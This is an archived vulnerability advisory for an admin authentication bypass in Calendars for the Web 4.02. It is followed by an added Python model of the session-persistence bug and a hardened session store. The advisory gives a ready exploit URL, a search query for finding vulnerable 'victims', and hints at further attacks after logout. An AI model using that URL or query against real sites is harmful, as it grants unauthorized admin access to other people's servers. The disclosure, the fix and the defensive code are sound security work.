Calendars for the Web 4.02 Admin Auth Bypass Vulnerability
2008-10-17T00:00:00
ID SSV:9744 Type seebug Reporter Root Modified 2008-10-17T00:00:00
Description
No description provided by source.
*******************************************************
*Exploit discovered by SecVuln from http://secvuln.com*
*Come join our clan! *
*contact secvuln@secvuln.com *
*******************************************************
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Author == SecVuln
Version == 4.02
Software == Calendars for the web by great hill corporation
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Calendars for the web has a vulnerability in the administration page.
The page saves the past session, so that anyone navigating to the page has
admin access.
Exploit:
Before attack: target.com/calendarWeb/cgi-bin/calweb/calweb.exe
After attack:
target.com/calendarWeb/cgi-bin/calweb/calweb.exe?cal=default&vt=6&cmd=900&act=0&dd=2008;10;03;12;00;00;&app=0&format=21x05i9r9s|SnriTmOdoaT&lastcmd=0
Example:
target.com/calendarWeb/cgi-bin/calweb/calweb.exe?cal=default&vt=6&cmd=900&act=0&dd=2008;10;03;12;00;00;&app=0&format=21x05i9r9s|SnriTmOdoaT&lastcmd=0
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
how to fix: set the login timeout to five minutes!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
A Google query can find a couple pages of victims: inurl:calweb/calweb.exe
Further hacks: if they disable the timeout you can still log in right after
they log out... You could probably do something with that
Also the 0 at the ending is the administrator (super user) id.
/////////////////////////////////////////////////////////////////
I take no responsibility for the misuse of the information.//////
Author will not be held liable for any damages //////
COME CHECK MY SITE OUT WWW.SECVULN.COM //////
////////////////////////////////////////////////////////////////
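The weakness described above is a server that remembers the last admin session and hands it to whoever visits next, with no idle timeout and no invalidation on logout. The following is an added illustration of that failure mode beside a corrected session store; it is not code from Calendars for the Web or from the advisory author, and the class and function names (VulnerableAdminPage, SessionStore, FakeClock, demo) are assumptions made for the example. The corrected store ties each session to a random token, enforces the five-minute idle limit the advisory recommends plus an absolute lifetime, and destroys the session on logout so a later visitor cannot inherit it.

```python
"""Model of a session-persistence auth bypass and its fix (constructed example)."""
from dataclasses import dataclass
import secrets
import time

IDLE_TIMEOUT_SECONDS = 5 * 60        # five-minute idle limit, as the advisory suggests
ABSOLUTE_TIMEOUT_SECONDS = 8 * 3600  # hard cap on session lifetime (assumed value)


@dataclass
class Session:
    user_id: str
    is_admin: bool
    created_at: float
    last_seen: float


class FakeClock:
    """Injectable clock so the example runs deterministically offline."""
    def __init__(self, start: float = 1_000_000.0):
        self.now = start

    def __call__(self) -> float:
        return self.now

    def advance(self, seconds: float) -> None:
        self.now += seconds


class VulnerableAdminPage:
    """Models the advisory's bug: the last login is kept server-side and any
    later visitor, even one presenting no credentials, is treated as that user."""
    def __init__(self):
        self.last_session = None

    def login(self, user_id: str, is_admin: bool, now: float) -> None:
        self.last_session = Session(user_id, is_admin, now, now)

    def is_admin_request(self, token=None) -> bool:
        # No token check and no expiry: the stored session is reused as-is.
        return self.last_session is not None and self.last_session.is_admin


class SessionStore:
    """Hardened store: per-session random token, idle and absolute timeouts,
    explicit invalidation on logout."""
    def __init__(self, clock=time.time,
                 idle_timeout=IDLE_TIMEOUT_SECONDS,
                 absolute_timeout=ABSOLUTE_TIMEOUT_SECONDS):
        self._sessions: dict[str, Session] = {}
        self._clock = clock
        self.idle_timeout = idle_timeout
        self.absolute_timeout = absolute_timeout

    def login(self, user_id: str, is_admin: bool) -> str:
        token = secrets.token_urlsafe(32)   # unguessable, unique per login
        now = self._clock()
        self._sessions[token] = Session(user_id, is_admin, now, now)
        return token

    def resolve(self, token):
        """Return the live Session for token, or None. Expired entries are purged."""
        s = self._sessions.get(token)
        if s is None:
            return None
        now = self._clock()
        if (now - s.last_seen > self.idle_timeout
                or now - s.created_at > self.absolute_timeout):
            del self._sessions[token]
            return None
        s.last_seen = now                   # sliding idle window
        return s

    def logout(self, token) -> None:
        # Destroy the session server-side; the token is useless afterwards.
        self._sessions.pop(token, None)

    def is_admin_request(self, token) -> bool:
        s = self.resolve(token)
        return s is not None and s.is_admin


def demo() -> dict:
    """Exercise both models and return the access decisions for inspection."""
    clock = FakeClock()

    vuln = VulnerableAdminPage()
    vuln.login("admin", True, clock())
    clock.advance(24 * 3600)               # a day later, nobody has logged out
    results = {"vulnerable_stranger_is_admin": vuln.is_admin_request()}  # True: bug

    store = SessionStore(clock=clock)
    token = store.login("admin", True)
    results["fresh_token"] = store.is_admin_request(token)      # True
    results["no_token"] = store.is_admin_request(None)          # False
    clock.advance(IDLE_TIMEOUT_SECONDS + 1)
    results["idle_expired"] = store.is_admin_request(token)     # False: idle limit hit
    token2 = store.login("admin", True)
    store.logout(token2)
    results["after_logout"] = store.is_admin_request(token2)    # False: invalidated
    return results


if __name__ == "__main__":
    for name, granted in demo().items():
        print(f"{name}: admin access {'GRANTED' if granted else 'denied'}")
```

The idle timeout alone covers the advisory's suggested fix; the logout invalidation is what closes the follow-on case the advisory mentions, where a visitor arriving right after the admin logs out would otherwise inherit a still-valid session.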